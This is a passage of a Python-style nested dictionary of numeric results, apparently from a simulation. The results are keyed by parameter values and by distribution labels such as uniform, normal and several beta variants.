0.21213500548933353, 'beta2': 0.2138950648584445, 'beta4': 0.20638012090126817}}, 200: {1000: {'uni': 0.2132043812817941, 'nor': 0.9112094985009763, 'beta1': 0.21016177088672316, 'beta2': 1.1300645808309855, 'beta4': 0.1220144503244021}, 750: {'uni': 0.21020500282826535, 'nor': 0.7303054388794163, 'beta1': 0.2082163820708222, 'beta2': 0.8966738981783481, 'beta4': 0.12513962151857672}, 500: {'uni': 0.21072696514065975, 'nor': 0.548060627369271, 'beta1': 0.2081097778706287, 'beta2': 0.6558892676359798, 'beta4': 0.13425940545320267}, 400: {'uni': 0.20826445824295223, 'nor': 0.4719804690803897, 'beta1': 0.20898168226932218, 'beta2': 0.6139619653605363, 'beta4': 0.14021057525633163}, 300: {'uni': 0.2088021243690594, 'nor': 0.41713866780936254, 'beta1': 0.2087285946134042, 'beta2': 0.5038582733443089, 'beta4': 0.14660369998262146}, 200: {'uni': 0.2095189003633896, 'nor': 0.34807203300134953, 'beta1': 0.21047061569599942, 'beta2': 0.3977231148120064, 'beta4': 0.156646349521216}, 150: {'uni': 0.2093387615726338, 'nor': 0.3085400352109468, 'beta1': 0.20643570767629546, 'beta2': 0.3615010078549322, 'beta4': 0.16375551575980912}, 100: {'uni': 0.21064378643772108, 'nor': 0.28151818018358465, 'beta1': 0.2090926446634528, 'beta2': 0.30632844588543734, 'beta4': 0.17625942352213347}, 75: {'uni': 0.20671027913469828, 'nor': 0.2618837476630965, 'beta1': 0.2088637313648498, 'beta2': 0.2742687431604851, 'beta4': 0.1779630781714797}, 50: {'uni': 0.20687981613909145, 'nor': 0.2452119427254388, 'beta1': 0.2096125229272614, 'beta2': 0.2528198013170253, 'beta4': 0.18932221495486176}, 30: {'uni': 0.20986940612030017, 'nor': 0.23138385594723265, 'beta1': 0.21273630607793315, 'beta2': 0.23562615341383045, 'beta4': 0.19662520636393377}, 20: {'uni': 0.2096800769725957, 'nor': 0.2219903761746839, 'beta1': 0.208530873235143, 'beta2': 0.22519313310665248, 'beta4': 0.20072480517089764}, 10: {'uni': 0.20995102667780532, 'nor': 0.21809511923800973, 'beta1': 0.21113193936796237, 'beta2': 0.21507494725665083, 'beta4': 0.20129922751033036}}, 150: {1000: {'uni': 0.21848728221083116, 'nor': 1.1494726368233732, 'beta1': 0.20925879994061328, 'beta2': 1.2847422292556834, 'beta4': 0.11801063285369316}, 750: {'uni': 0.21006532285377288, 'nor': 0.9160472232808671, 'beta1': 0.21041748896864573, 'beta2': 0.9842221927965498, 'beta4': 0.120532017454987}, 500: {'uni': 0.2109702173498153, 'nor': 0.6730564167022827, 'beta1': 0.20805261563312868, 'beta2': 0.8093562303980775, 'beta4': 0.1285665146333448}, 400: {'uni': 0.21151275112656406, 'nor': 0.5927363236218804, 'beta1': 0.21031761704813068, 'beta2': 0.6698968663874326, 'beta4': 0.1308993211614878}, 300: {'uni': 0.21116665878281402, 'nor': 0.4896592957082567, 'beta1': 0.20684320922443974, 'beta2': 0.5512275592001699, 'beta4': 0.1384612397829126}, 200: {'uni': 0.2065247059685983, 'nor': 0.39835048373839826, 'beta1': 0.21174588540195607, 'beta2': 0.44630982353810156, 'beta4': 0.14805783066157965}, 150: {'uni': 0.20928770803093008, 'nor': 0.34961127920202617, 'beta1': 0.2109639639405676, 'beta2': 0.3797293742818744, 'beta4': 0.15746136802847555}, 100: {'uni': 0.20516824818584412, 'nor': 0.3028139312794487, 'beta1': 0.20853523204098995, 'beta2': 0.32225079750893787, 'beta4': 0.16753709332890135}, 75: {'uni': 0.20502748437818377, 'nor': 0.2741211171871183, 'beta1': 0.2105448811718868, 'beta2': 0.29080653527776035, 'beta4': 0.17337872442507027}, 50: {'uni': 0.20975717836080796, 'nor': 0.2565379219984574, 'beta1': 0.20800987078537114, 'beta2': 0.2600989628289811, 'beta4': 0.18429779524384918}, 30: {'uni': 0.20720342119680604, 'nor': 0.24088086582328805, 'beta1': 0.20748583588931385, 'beta2': 0.24007860960850408, 'beta4': 0.19211149401323768}, 20: {'uni': 0.20755790128204296, 'nor': 0.22922666615794668, 'beta1': 0.21085331137645344, 'beta2': 0.2271126160773065, 'beta4': 0.19726350188991543}, 10: {'uni': 0.2115436004822682, 'nor': 0.21966947518702792, 'beta1': 0.21107364597857337, 'beta2': 0.22048945023217323, 'beta4': 0.20507045435880536}}, 100: {1000: {'uni': 0.21967845045275625, 'nor': 1.656278094432771, 'beta1': 0.21090054785594217, 'beta2': 1.405234644927156, 'beta4': 0.1134712510665932}, 750: {'uni': 0.2182058622345823, 'nor': 1.265623071214558, 'beta1': 0.21028572752611807, 'beta2': 1.1279524417411784, 'beta4': 0.11526715616074444}, 500: {'uni': 0.21472950659279263, 'nor': 0.9157340420582806, 'beta1': 0.20915259969907926, 'beta2': 0.8857345708052237, 'beta4': 0.11958569682583288}, 400: {'uni': 0.21489446434289045, 'nor': 0.7677784731205918, 'beta1': 0.21081206178893352, 'beta2': 0.7609743126081624, 'beta4': 0.12541109277349732}, 300: {'uni': 0.2159893589251412, 'nor': 0.6256342238393243, 'beta1': 0.20763666455794746, 'beta2': 0.6119368944285761, 'beta4': 0.13023773680445308}, 200: {'uni': 0.2091742902933585, 'nor': 0.48879729015887435, 'beta1': 0.20831908379432781, 'beta2': 0.4888715032902842, 'beta4': 0.13778468684559775}, 150: {'uni': 0.2090160321323569, 'nor': 0.4187490294676396, 'beta1': 0.2109398590174564, 'beta2': 0.43024124336877606, 'beta4': 0.1462052336856702}, 100: {'uni': 0.2104322507772914, 'nor': 0.35145353863818374, 'beta1': 0.2078275315127688, 'beta2': 0.3527286738203107, 'beta4': 0.15819495462335323}, 75: {'uni': 0.20969432604237917, 'nor': 0.3190469158495116, 'beta1': 0.2123788151559664, 'beta2': 0.31885461616358585, 'beta4': 0.16304448328983254}, 50: {'uni': 0.2087204645903672, 'nor': 0.2784565063957156, 'beta1': 0.20898686396465999, 'beta2': 0.2724721715932801, 'beta4': 0.1748949757811885}, 30: {'uni': 0.21180576782357857, 'nor': 0.2510792661255587, 'beta1': 0.21157574079679234, 'beta2': 0.2492653810399887, 'beta4': 0.18637405643646768}, 20: {'uni': 0.20986822684158538, 'nor': 0.24044968609243367, 'beta1': 0.20976936068946686, 'beta2': 0.22969757707032978, 'beta4': 0.1933966348868532}, 10: {'uni': 0.2092931057812649, 'nor': 0.2274358627877835, 'beta1': 0.20973251389792952, 'beta2': 0.22006451815316508, 'beta4': 0.20444803640329232}}, 75: {1000: {'uni': 0.23513931545998662, 'nor': 2.084909469742905, 'beta1': 0.21014505352475218, 'beta2': 1.5806301519779993, 'beta4': 0.10998758656318001}, 750: {'uni': 0.2286541491929865, 'nor': 1.6373557492661108, 'beta1': 0.20978951011443275, 'beta2': 1.2456465113380724, 'beta4': 0.11259632219485577}, 500: {'uni': 0.22247281469777053, 'nor': 1.150511057022818, 'beta1': 0.2073585482490993, 'beta2': 0.9812552247229969, 'beta4': 0.11625486022546717}, 400: {'uni': 0.21951372585892182, 'nor': 0.9569843642606499, 'beta1': 0.20823968509523264, 'beta2': 0.8066142797690702, 'beta4': 0.12044519385671562}, 300: {'uni': 0.21781287693048623, 'nor': 0.7725858773053905, 'beta1': 0.21194743463485233, 'beta2': 0.6922651737298109, 'beta4': 0.12461002806743086}, 200: {'uni': 0.21199124103966535, 'nor': 0.580982989647824, 'beta1': 0.20939209173887577, 'beta2': 0.5462914146214966, 'beta4': 0.13270550013960777}, 150: {'uni': 0.21252879710179673, 'nor': 0.4987347923010613, 'beta1': 0.20783211493381504, 'beta2': 0.45356054189282985, 'beta4': 0.13809523671194257}, 100: {'uni': 0.2089361893031747, 'nor': 0.403915226761567, 'beta1': 0.2093217404846438, 'beta2': 0.38016607644734646, 'beta4': 0.14840466776444083}, 75: {'uni': 0.2081440553080188, 'nor': 0.35109507781411226, 'beta1': 0.20929729980155615, 'beta2': 0.3327341468495961, 'beta4': 0.1540449114797875}, 50: {'uni': 0.20581675234683908, 'nor': 0.30206067979551837, 'beta1': 0.21021696834721026, 'beta2': 0.2861955478547944, 'beta4': 0.16633361029387916}, 30: {'uni': 0.20734524509571534, 'nor': 0.267037913698908, 'beta1': 0.2070263091653566, 'beta2': 0.25806159877220175, 'beta4': 0.17863030675847164}, 20: {'uni': 0.2096733930631222, 'nor': 0.2460070167669823, 'beta1': 0.20871469364964274, 'beta2': 0.2372662315858424, 'beta4': 0.1892580676002318}, 10: {'uni': 0.20922208007633622, 'nor': 0.23213075562898852, 'beta1': 0.21070476962686652, 'beta2': 0.2225315024021926, 'beta4': 0.19641028263808016}}, 50: {1000: {'uni': 0.2695254349236613, 'nor': 3.142691210261647, 'beta1': 0.21770786185287255, 'beta2': 1.9099319895352667, 'beta4': 0.10829969370253238}, 750: {'uni': 0.2588039542291625, 'nor': 2.4104366375812973, 'beta1': 0.21243577719321954, 'beta2': 1.5161955837891, 'beta4': 0.11111092000239313}, 500: {'uni': 0.24151301038044345, 'nor': 1.642139887107223, 'beta1': 0.20971867796492333, 'beta2': 1.1517381077121902, 'beta4': 0.11227898068455419}, 400: {'uni': 0.23019437797823078, 'nor': 1.3289789466534643, 'beta1': 0.20926242715400342, 'beta2': 0.9729778013434685, 'beta4': 0.11417269932418249}, 300: {'uni': 0.22430893764793297, 'nor': 1.0745150609309957, 'beta1': 0.21074805474629227, 'beta2': 0.7874596109511961, 'beta4': 0.11759814856362567}, 200: {'uni': 0.21975399445220514, 'nor': 0.7819720121056168, 'beta1': 0.21103937980028964, 'beta2': 0.6018534363417153, 'beta4': 0.12339286742106902}, 150: {'uni': 0.21535142554197367, 'nor': 0.6399318456941945, 'beta1': 0.20746526428424497, 'beta2': 0.5252845548984273, 'beta4': 0.1299381165608297}, 100: {'uni': 0.2123454504262325, 'nor': 0.49216704078244555, 'beta1': 0.2107022782636202, 'beta2': 0.4230176226912828, 'beta4': 0.1378036793670446}, 75: {'uni': 0.21339732015322407, 'nor': 0.43149068654833117, 'beta1': 0.21058764807741492, 'beta2': 0.3671011243377202, 'beta4': 0.14620561061096438}, 50: {'uni': 0.205847661172318, 'nor': 0.35582897249323403, 'beta1': 0.20909648270681516, 'beta2': 0.31178396791388713, 'beta4': 0.15722296123371624}, 30: {'uni': 0.20934069442572217, 'nor': 0.29138119383616384, 'beta1': 0.20982580627900296, 'beta2': 0.26854176799687446, 'beta4': 0.17071014481863203}, 20: {'uni': 0.20668196194747926, 'nor': 0.26568332305135134, 'beta1': 0.2093142297545193, 'beta2': 0.24526630860745893, 'beta4': 0.17811324491132643}, 10: {'uni': 0.20958328438574503, 'nor': 0.23896053895205074, 'beta1': 0.20621410607741605, 'beta2': 0.22919187002100394, 'beta4': 0.19431842828786478}}, 30: {1000: {'uni': 0.39110763945461735, 'nor': 5.116424860683267, 'beta1': 0.2276039800167104, 'beta2': 2.4580179105664364, 'beta4': 0.1066835465038891}, 750: {'uni': 0.3418714368913198, 'nor': 3.8744007700100593, 'beta1': 0.22395548891655492, 'beta2': 2.0103017113808224, 'beta4': 0.10947374482580367}, 500: {'uni': 0.2975942162732659, 'nor': 2.6218136300691874, 'beta1': 0.21825444046578688, 'beta2': 1.3847556622818173, 'beta4': 0.10899418892034965}, 400: {'uni': 0.27461362852151405, 'nor': 2.1151034436155616, 'beta1': 0.2171198331223813, 'beta2': 1.2167467458708006, 'beta4': 0.11163855842113928}, 300: {'uni': 0.2543881091715356, 'nor': 1.6452365204119028, 'beta1': 0.212256506611666, 'beta2': 0.9687476062374452, 'beta4': 0.1115492019613656}, 200: {'uni': 0.2363522619554879, 'nor': 1.1677455360609652, 'beta1': 0.20966125872182179, 'beta2': 0.7425629231901374, 'beta4': 0.11625099173205072}, 150: {'uni': 0.2284148219949321, 'nor': 0.9574829237962695, 'beta1': 0.21023861819542058, 'beta2': 0.6139346611358466, 'beta4': 0.12009639988691045}, 100: {'uni': 0.22172498485669878, 'nor': 0.6915027995999989, 'beta1': 0.20918706109846394, 'beta2': 0.4869056843738299, 'beta4': 0.12638594109716492}, 75: {'uni': 0.2133168698992867, 'nor': 0.5682112038946274, 'beta1': 0.20975000504788754, 'beta2': 0.415282241094064, 'beta4': 0.13226527569518623}, 50: {'uni': 0.2102271307152469, 'nor': 0.44595128782042287, 'beta1': 0.20889065230992968, 'beta2': 0.3465767337644295, 'beta4': 0.14070658143472944}, 30: {'uni': 0.2081426512303808, 'nor': 0.35207891188712104, 'beta1': 0.20871532977976312, 'beta2': 0.29316990128238446, 'beta4': 0.15666183548008356}, 20: {'uni': 0.20613997335614362, 'nor': 0.30583981878707406, 'beta1': 0.20836781704793886, 'beta2': 0.2598156056480911, 'beta4': 0.16790033081050695}, 10: {'uni': 0.20923753020638328, 'nor': 0.2612046113020479, 'beta1': 0.20989685334843394, 'beta2': 0.23114069560918055, 'beta4': 0.1835407880975625}}, 20: {1000: {'uni': 0.6207826394599372, 'nor': 7.622424720173352, 'beta1': 0.27350677793760486, 'beta2': 3.3492996942172333, 'beta4': 0.10628262555709497}, 750: {'uni': 0.5048166737138563, 'nor': 5.758152270393112, 'beta1': 0.2554155723862364, 'beta2': 2.628076590546046, 'beta4': 0.10565019639609735}, 500: {'uni': 0.3994453354156638, 'nor': 3.893980758511552, 'beta1': 0.23597727883342787, 'beta2': 1.8214218995092328, 'beta4': 0.1070101907165029}, 400: {'uni': 0.36101676480694145, 'nor': 3.2044600872159323, 'beta1': 0.23459375200447094, 'beta2': 1.5251543211986895, 'beta4': 0.10821295023254038}, 300: {'uni': 0.3141921739962661, 'nor': 2.4222433418314364, 'beta1': 0.2253430945453138, 'beta2': 1.1967541480073822, 'beta4': 0.1099708991006131}, 200: {'uni': 0.27835872559274455, 'nor': 1.681652690097508, 'beta1': 0.21894420597565414, 'beta2': 0.8889375477356823, 'beta4': 0.11351788787975257}, 150: {'uni': 0.2559570089433474, 'nor': 1.3438963170616764, 'beta1': 0.21477483270291053, 'beta2': 0.7257408247226198, 'beta4': 0.11394879683852287}, 100: {'uni': 0.23822025966558683, 'nor': 0.9711825862107801, 'beta1': 0.20802563703769897, 'beta2': 0.5623026745072711, 'beta4': 0.12026175575681236}, 75: {'uni': 0.2293403279687202, 'nor': 0.7729220747351444, 'beta1': 0.21100752732670153, 'beta2': 0.48330787981629864, 'beta4': 0.12382986936052359}, 50: {'uni': 0.21915378007158956, 'nor': 0.5693299836933317, 'beta1': 0.2078415744294394, 'beta2': 0.38674682907023844, 'beta4': 0.13204002010791535}, 30: {'uni': 0.2082265622167124, 'nor': 0.43443417831024433, 'beta1': 0.20687391089208745, 'beta2': 0.31119395493380003, 'beta4': 0.1431516191386846}, 20: {'uni': 0.20786603570028708, 'nor': 0.3572940044777373, 'beta1': 0.20719910244124543, 'beta2': 0.27721462641843725, 'beta4': 0.1572608236251125}, 10: {'uni': 0.20369256732614355, 'nor': 0.28182536192865026, 'beta1': 0.20756249721014605, 'beta2': 0.2385183054251573, 'beta4': 0.1697626070090186}}, 10: {1000: {'uni': 1.7848701057995784, 'nor': 15.635739381402702, 'beta1': 0.7153891703487703, 'beta2': 5.697088420798187, 'beta4': 0.10421112845871394}, 750: {'uni': 1.3727979678132771, 'nor': 11.906755261463388, 'beta1': 0.5779728985731243, 'beta2': 4.449716590642079, 'beta4': 0.10498414486075403}, 500: {'uni': 0.9573992786589071, 'nor': 7.970320890499278, 'beta1': 0.43798339579132395, 'beta2': 2.974231536993935, 'beta4': 0.105026735404256}, 400: {'uni': 0.7914977735882762, 'nor': 6.440897945489786, 'beta1': 0.39007392596960755, 'beta2': 2.429667687774588, 'beta4': 0.10605337636852458}, 300: {'uni': 0.631330878442672, 'nor': 4.933284287935752, 'beta1': 0.33438904339835235, 'beta2': 1.877753461391385, 'beta4': 0.1073668070340185}, 200: {'uni': 0.48173020420613244, 'nor': 3.3803827492127008, 'beta1': 0.28744959584371677, 'beta2': 1.3439600818077662, 'beta4': 0.10776359310849748}, 150: {'uni': 0.40031324179507105, 'nor': 2.57622592994642, 'beta1': 0.26035189199173386, 'beta2': 1.0427967524110597, 'beta4': 0.11000574720566421}, 100: {'uni': 0.3308720201998832, 'nor': 1.7649850100433184, 'beta1': 0.2383561944351031, 'beta2': 0.7771083680176007, 'beta4': 0.11235247896090703}, 75: {'uni': 0.2865533700253337, 'nor': 1.3593086400799728, 'beta1': 0.23083619480349551, 'beta2': 0.6354900601807595, 'beta4': 0.1136946403621595}, 50: {'uni': 0.25864424310430745, 'nor': 0.9824603279253074, 'beta1': 0.22334506582001382, 'beta2': 0.49223837414214233, 'beta4': 0.12081061110449474}, 30: {'uni': 0.22836973422604787, 'nor': 0.676619660745287, 'beta1': 0.20951021970104433, 'beta2': 0.3741306279869527, 'beta4': 0.12652156529997072}, 20: {'uni': 0.21515643043692204, 'nor': 0.5180809461964594, 'beta1': 0.20397488858742926, 'beta2': 0.3088295715698039, 'beta4': 0.13725565024846206}, 10: {'uni': 0.20341357315487396, 'nor': 0.3736834213121383, 'beta1': 0.20162371182875433, 'beta2': 0.24957048788715058, 'beta4': 0.15490910948174905}}}, 0.3: {1000: {1000: {'uni': 0.18428871913527797, 'nor': 0.30135078484266026, 'beta1': 0.18393654917719088, 'beta2': 0.6623093381207533, 'beta4': 0.14032810218137845}, 750: {'uni': 0.18262805116604833, 'nor': 0.27195486539150565, 'beta1': 0.18602130658962418, 'beta2': 0.4878718144267021, 'beta4': 0.14691168329765347}, 500: {'uni': 0.18356636941170307, 'nor': 0.2416953142020874, 'beta1': 0.18423960757549646, 'beta2': 0.357987213680477, 'beta4': 0.15566079017126216}, 400: {'uni': 0.18398269310746806, 'nor': 0.23033211237917395, 'beta1': 0.18313599133249095, 'beta2': 0.31498091495327957, 'beta4': 0.15747557950230512}, 300: {'uni': 0.18359581287903043, 'nor': 0.21664672148715478, 'beta1': 0.1859716509858502, 'beta2': 0.27672572480296337, 'beta4': 0.16484989128991967}, 200: {'uni': 0.18292786874448827, 'nor': 0.20406786775434288, 'beta1': 0.1842414647509748, 'beta2': 0.24027300035558413, 'beta4': 0.1699466212939197}, 150: {'uni': 0.18455107320985933, 'nor': 0.20188485575373824, 'beta1': 0.18479437012880134, 'beta2': 0.22923323632544906, 'beta4': 0.16924173674935705}, 100: {'uni': 0.18513992851403205, 'nor': 0.19487665525991182, 'beta1': 0.18489669398913675, 'beta2': 0.20828847343235687, 'beta4': 0.17566406407424956}, 75: {'uni': 0.1865632455464677, 'nor': 0.19358711616627014, 'beta1': 0.18565141251922007, 'beta2': 0.20582303873952032, 'beta4': 0.1791155456720297}, 50: {'uni': 0.18426457302663726, 'nor': 0.1916482647518717, 'beta1': 0.1852315833036702, 'beta2': 0.19764339843274478, 'beta4': 0.18112274314507698}, 30: {'uni': 0.18349819467351894, 'nor': 0.1888489836368484, 'beta1': 0.18261593670270432, 'beta2': 0.19034464682698157, 'beta4': 0.18224418746461715}, 20: {'uni': 0.1820714679130019, 'nor': 0.18754105929514656, 'beta1': 0.18430122581588568, 'beta2': 0.1920075339274084, 'beta4': 0.1834021882349476}, 10: {'uni': 0.18739411665561917, 'nor': 0.18497627238155476, 'beta1': 0.18440842636140978, 'beta2': 0.18841016365805804, 'beta4': 0.1846995716387348}}, 750: {1000: {'uni': 0.18374768272406486, 'nor': 0.3362941599325207, 'beta1': 0.18340789412067696, 'beta2': 0.664773656168264, 'beta4': 0.13309238170252863}, 750: {'uni': 0.18528145820779707, 'nor': 0.30013344141016346, 'beta1': 0.1831987566147265, 'beta2': 0.5032347489310731, 'beta4': 0.1410482071937854}, 500: {'uni': 0.18484168589686367, 'nor': 0.2605615429499437, 'beta1': 0.18463915891771657, 'beta2': 0.3713535347423807, 'beta4': 0.14822832304391478}, 400: {'uni': 0.18311116918143328, 'nor': 0.2459445558763436, 'beta1': 0.1845402672165048, 'beta2': 0.31907073757767096, 'beta4': 0.15317162329719258}, 300: {'uni': 0.18617543522232655, 'nor': 0.2298916232269604, 'beta1': 0.18461903342585026, 'beta2': 0.28363567342745244, 'beta4': 0.16036130415744101}, 200: {'uni': 0.18393910883726228, 'nor': 0.21640952080746054, 'beta1': 0.1818765723127742, 'beta2': 0.25012191141345425, 'beta4': 0.16552665865239316}, 150: {'uni': 0.18417926544247398, 'nor': 0.21092728516574843, 'beta1': 0.18212118551922038, 'beta2': 0.23142014151434875, 'beta4': 0.17002055544787953}, 100: {'uni': 0.18660805942978306, 'nor': 0.20081262797470406, 'beta1': 0.18602127924312306, 'beta2': 0.21271648680506355, 'beta4': 0.17563839287175947}, 75: {'uni': 0.18251540717557313, 'nor': 0.19535814734848456, 'beta1': 0.18595619280052217, 'beta2': 0.20594100979366686, 'beta4': 0.17820076426208542}, 50: {'uni': 0.18539776665656268, 'nor': 0.18951186752224017, 'beta1': 0.1852697716498855, 'beta2': 0.19992731375199027, 'beta4': 0.1784937421131358}, 30: {'uni': 0.18536533904676694, 'nor': 0.18935679046326837, 'beta1': 0.1841613478222738, 'beta2': 0.1916231974678531, 'beta4': 0.18187773474697502}, 20: {'uni': 0.1848315245851324, 'nor': 0.18898711958365183, 'beta1': 0.18464481892838294, 'beta2': 0.19085126812258635, 'beta4': 0.1811843211494424}, 10: {'uni': 0.18587075842322476, 'nor': 0.18597838609621442, 'beta1': 0.18573865004138826, 'beta2': 0.18763548127142246, 'beta4': 0.18370702416582232}}, 500: {1000: {'uni': 0.1840197346218617, 'nor': 0.41329662361079555, 'beta1': 0.18357700766562535, 'beta2': 0.7671344496261001, 'beta4': 0.1239289639044978}, 750: {'uni': 0.1862202743865642, 'nor': 0.3558982422843902, 'beta1': 0.18378140850915506, 'beta2': 0.564532583117132, 'beta4': 0.13340893800976383}, 500: {'uni': 0.1867485748124686, 'nor': 0.2977486468510908, 'beta1': 0.18390546912974548, 'beta2': 0.4195979083937472, 'beta4': 0.14038875085337116}, 400: {'uni': 0.18301639686674334, 'nor': 0.2769565773370171, 'beta1': 0.18366710919376103, 'beta2': 0.3628265004684875, 'beta4': 0.14451613900496404}, 300: {'uni': 0.18217744868887228, 'nor': 0.25629722024533996, 'beta1': 0.18385836640021477, 'beta2': 0.3176579397228085, 'beta4': 0.1524618313858445}, 200: {'uni': 0.18381375844550923, 'nor': 0.23550026000616722, 'beta1': 0.18438255429091854, 'beta2': 0.2656404724828914, 'beta4': 0.16063694634139747}, 150: {'uni': 0.185767292870415, 'nor': 0.21655429857888203, 'beta1': 0.18544627228662178, 'beta2': 0.24932819367864345, 'beta4': 0.16092725112085177}, 100: {'uni': 0.183824799626394, 'nor': 0.20477567037634878, 'beta1': 0.18240757458040802, 'beta2': 0.2309883526806697, 'beta4': 0.16967806719643808}, 75: {'uni': 0.18605984660927738, 'nor': 0.2028444202047503, 'beta1': 0.18483867144383112, 'beta2': 0.21138880444392175, 'beta4': 0.17257719810968203}, 50: {'uni': 0.1839877971831852, 'nor': 0.19904840183947525, 'beta1': 0.18435011648014876, 'beta2': 0.2031296680146621, 'beta4': 0.17697434657873212}, 30: {'uni': 0.1852975402896129, 'nor': 0.1937864670123576, 'beta1': 0.1844117140912648, 'beta2': 0.19398025817323694, 'beta4': 0.1787671102793916}, 20: {'uni': 0.1835863762986978, 'nor': 0.18775276741046626, 'beta1': 0.1854475463987617, 'beta2': 0.19424887742008315, 'beta4': 0.1825324678833545}, 10: {'uni': 0.18547874179765314, 'nor': 0.18647231053828683, 'beta1': 0.18691385489683274, 'beta2': 0.18948179328044443, 'beta4': 0.18672470390138896}}, 400: {1000: {'uni': 0.1841369848304773, 'nor': 0.487660743593779, 'beta1': 0.18603853288523334, 'beta2': 0.7559165215470582, 'beta4': 0.12068379560836835}, 750: {'uni': 0.18594200781108275, 'nor': 0.4019961108476163, 'beta1': 0.1831083524376866, 'beta2': 0.5621271751603673, 'beta4': 0.12505172473964998}, 500: {'uni': 0.18127077759894958, 'nor': 0.33508422714167163, 'beta1': 0.18535703359501093, 'beta2': 0.41486646451853243, 'beta4': 0.13358961945450476}, 400: {'uni': 0.18847261367235257, 'nor': 0.30475927406457665, 'beta1': 0.18497037370002964, 'beta2': 0.36875432228911315, 'beta4': 0.14131860591700407}, 300: {'uni': 0.1834846960752523, 'nor': 0.27353443866255184, 'beta1': 0.1834736799127996, 'beta2': 0.3187931017458791, 'beta4': 0.14680948452922632}, 200: {'uni': 0.18409437296619705, 'nor': 0.24217133661747858, 'beta1': 0.18522243948305703, 'beta2': 0.28587114638809447, 'beta4': 0.15505648619089624}, 150: {'uni': 0.18244003118893568, 'nor': 0.226720503763241, 'beta1': 0.18452371980644955, 'beta2': 0.2611888455461119, 'beta4': 0.16155402213844164}, 100: {'uni': 0.18514469973669406, 'nor': 0.21427742853579504, 'beta1': 0.1851360561865889, 'beta2': 0.22915500414895795, 'beta4': 0.16887082288872826}, 75: {'uni': 0.1835023368961724, 'nor': 0.20486594519436654, 'beta1': 0.18377651974601344, 'beta2': 0.21901133656471286, 'beta4': 0.17287421533479064}, 50: {'uni': 0.18342146941233753, 'nor': 0.19818564803314914, 'beta1': 0.18651883278191514, 'beta2': 0.20678119783042662, 'beta4': 0.1747652506641469}, 30: {'uni': 0.18552948646943832, 'nor': 0.1935765150016701, 'beta1': 0.18278857493937808, 'beta2': 0.19611341856361825, 'beta4': 0.17788395999027673}, 20: {'uni': 0.1854587786790248, 'nor': 0.1919505201797072, 'beta1': 0.18541896834325705, 'beta2': 0.19533887086414536, 'beta4': 0.18198315689749184}, 10: {'uni': 0.18885914557340622, 'nor': 0.18992736227894721, 'beta1': 0.1849685952581873, 'beta2': 0.19142863221490666, 'beta4': 0.18437904185055504}}, 300: {1000: {'uni': 0.1859502958978716, 'nor': 0.572254915990919, 'beta1': 0.18506222558285604, 'beta2': 0.8127163948003021, 'beta4': 0.11600632777201067}, 750: {'uni': 0.18353876060887495, 'nor': 0.47315381492266284, 'beta1': 0.1848466855593917, 'beta2': 0.6057402676429029, 'beta4': 0.12128921997929693}, 500: {'uni': 0.18626459428841338, 'nor': 0.3739859643670168, 'beta1': 0.18370108978687505, 'beta2': 0.4519785398696026, 'beta4': 0.12934443321886013}, 400: {'uni': 0.1846926635410675, 'nor': 0.3373977956534747, 'beta1': 0.18379894550505346, 'beta2': 0.4001772516695409, 'beta4': 0.1324871096490525}, 300: {'uni': 0.18335882742457615, 'nor': 0.30207061691602766, 'beta1': 0.18498395112897797, 'beta2': 0.36823738539844797, 'beta4': 0.1377813467667352}, 200: {'uni': 0.18146517018597558, 'nor': 0.2626023742570726, 'beta1': 0.18490638293978268, 'beta2': 0.3032691430926139, 'beta4': 0.14811129872849652}, 150: {'uni': 0.18567150605670413, 'nor': 0.24293312006244636, 'beta1': 0.1839383721262982, 'beta2': 0.275147983363257, 'beta4': 0.15562446570752247}, 100: {'uni': 0.18188590503553012, 'nor': 0.22192190869354672, 'beta1': 0.18220796971542047, 'beta2': 0.23656612557764944, 'beta4': 0.16384483291051324}, 75: {'uni': 0.18269712408432776, 'nor': 0.21086971209758135, 'beta1': 0.1834266929677532, 'beta2': 0.22384625002314135, 'beta4': 0.16689861495602365}, 50: {'uni': 0.1840829104983384, 'nor': 0.20409631279707927, 'beta1': 0.18537818691491365, 'beta2': 0.21037244642654657, 'beta4': 0.17260776897824953}, 30: {'uni': 0.1857425742322888, 'nor': 0.19571874411864754, 'beta1': 0.1841318534190506, 'beta2': 0.19779885160629435, 'beta4': 0.17876031436503564}, 20: {'uni': 0.1832365591664123, 'nor': 0.19167311662078532, 'beta1': 0.18394313243440424, 'beta2': 0.19630589705739027, 'beta4': 0.17733581077369834}, 10: {'uni': 0.18618532512109023, 'nor': 0.19128318068045697, 'beta1': 0.18757253910951685, 'beta2': 0.1883616111678228, 'beta4': 0.18555417888606063}}, 200: {1000: {'uni': 0.18447141627562533, 'nor': 0.7699551232189373, 'beta1': 0.18500514582732694, 'beta2': 0.9127793666354577, 'beta4': 0.11011784883611928}, 750: {'uni': 0.18259356525682377, 'nor': 0.6257554784789408, 'beta1': 0.18488440955510677, 'beta2': 0.7088043074557446, 'beta4': 0.11359776947078477}, 500: {'uni': 0.18589358539985096, 'nor': 0.4829959037714713, 'beta1': 0.183474877505319, 'beta2': 0.514168880108097, 'beta4': 0.11953892464970942}, 400: {'uni': 0.18351796321070915, 'nor': 0.4164296854250865, 'beta1': 0.18195958720877065, 'beta2': 0.5056205486626194, 'beta4': 0.12416969797920921}, 300: {'uni': 0.18481464734448674, 'nor': 0.3658259098465722, 'beta1': 0.18663125274408293, 'beta2': 0.416910138713319, 'beta4': 0.13056310975294855}, 200: {'uni': 0.18530334268616938, 'nor': 0.302407317725596, 'beta1': 0.1834849866924257, 'beta2': 0.3292982361018997, 'beta4': 0.13984005968045923}, 150: {'uni': 0.18596448269266944, 'nor': 0.2739436092802089, 'beta1': 0.18707957912766168, 'beta2': 0.30543377100001085, 'beta4': 0.14629701832782}, 100: {'uni': 0.1832977085363229, 'nor': 0.23946363968388915, 'beta1': 0.18427350012102758, 'beta2': 0.2591834715329377, 'beta4': 0.15533563468189326}, 75: {'uni': 0.18356926635465065, 'nor': 0.2279517116490053, 'beta1': 0.1830851794256456, 'beta2': 0.23633947470700803, 'beta4': 0.16177484111825208}, 50: {'uni': 0.18425403756506012, 'nor': 0.2157915511740745, 'beta1': 0.1820152616826392, 'beta2': 0.21828882661440663, 'beta4': 0.16842779941176925}, 30: {'uni': 0.18360266531359176, 'nor': 0.20210998834312802, 'beta1': 0.18687171669955455, 'beta2': 0.20496758550143304, 'beta4': 0.17293751761529214}, 20: {'uni': 0.1851863710681571, 'nor': 0.19433366890581394, 'beta1': 0.18557623225739414, 'beta2': 0.19875199384282216, 'beta4': 0.17788405593123227}, 10: {'uni': 0.18634472764248708, 'nor': 0.19324764133732816, 'beta1': 0.18562771164336173, 'beta2': 0.19080409259813716, 'beta4': 0.18110054533211944}}, 150: {1000: 